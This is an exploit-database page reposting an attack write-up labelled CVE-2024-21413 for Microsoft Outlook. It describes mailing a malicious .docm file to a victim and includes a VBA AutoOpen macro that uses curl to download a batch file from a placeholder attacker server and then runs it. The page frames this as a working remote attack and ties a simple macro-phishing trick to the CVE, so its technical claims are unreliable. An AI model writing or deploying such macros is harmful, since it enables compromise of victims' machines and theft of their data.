Advertisement






Microsoft Outlook Remote Code Execution Vulnerability - CVE-2024-21413

CVE Category Price Severity
CVE-2024-21413 CWE-XX Not Specified High
Author Risk Exploitation Type Date
Not Specified High Remote 2024-03-24
CPE
Not Specified
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030055

Below is a copy:

Microsoft Outlook Remote Code Execution Vulnerability - CVE-2024-21413
## Title: Microsoft Outlook Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/20/2024
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook
## Reference: https://www.bugcrowd.com/glossary/remote-code-execution-rce/
## CVE: CVE-2024-21413

## Description:
By sending a malicious (.docm) file, to the victim using the Outlook mail  app of 365, the attacker will wait for the victim to click on it by using and executing his malicious code after the victim opens this file. After this action, the attacker can get control of some parts of the Windows services, he can steal sensitive information, and make a bot machine from the victims PC.

STATUS: MEDIUM- Vulnerability

## Exploit:
The exploit can be deployed on a remote attacking server, as you can see on the second [video](https://youtu.be/zxrlV8lgoB0?si=YrTOR3wk_QLuABbd).
I am not responsible if someone breaks someone's system. You will respond FRONT OF THE LAW!

```
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://path_to_your_exploit_server.bat > PoC.bat && .\PoC.bat", vbNormalFocus)
End Sub
```

## Source:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2024/CVE-2024-21413)

## Proof and Exploit:
[href](https://www.youtube.com/watch?v=zxrlV8lgoB0)
[href](https://www.patreon.com/posts/microsoft-remote-100840891)

## Time spent:
01:17:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.